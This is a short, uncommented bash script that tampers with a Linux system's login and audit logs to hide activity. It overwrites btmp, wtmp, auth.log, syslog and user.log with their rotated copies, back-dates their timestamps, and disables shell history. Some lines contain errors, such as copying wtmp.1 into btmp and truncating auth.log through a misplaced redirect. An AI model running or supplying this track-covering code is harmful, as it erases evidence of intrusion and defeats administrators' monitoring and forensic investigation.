#!/bin/bash
test ! -e /var/log/btmp && >/var/log/btmp
test ! -e /var/log/btmp.1 && >/var/log/btmp.1
test ! -e /var/log/wtmp && >/var/log/wtmp
test ! -e /var/log/wtmp.1 && >/var/log/wtmp.1
test ! -e /var/log/auth.log && >/var/log/auth.log
test ! -e /var/log/auth.log.1 && >/var/log/auth.log.1
test ! -e /var/log/syslog && >/var/log/syslog
test ! -e /var/log/syslog.1 && >/var/log/syslog.1
test ! -e /var/log/user.log && >/var/log/user.log
test ! -e /var/log/user.log.1 && >/var/log/user.log.1
cat /var/log/btmp.1 > /var/log/btmp
touch -r /var/log/btmp.1 /var/log/btmp
cat /var/log/wtmp.1 > /var/log/btmp
touch -r /var/log/wtmp.1 /var/log/wtmp
cat /var/log/auth.log.1 > /var/log/auth.log
touch -r /var/log/auth.log.1 > /var/log/auth.log
cat /var/log/syslog.1 > /var/log/syslog
touch -r /var/log/syslog.1 /var/log/syslog
cat /var/log/user.log.1 > /var/log/user.log
touch -r /var/log/user.log.1 /var/log/user.log
export HISTFILE=/dev/null
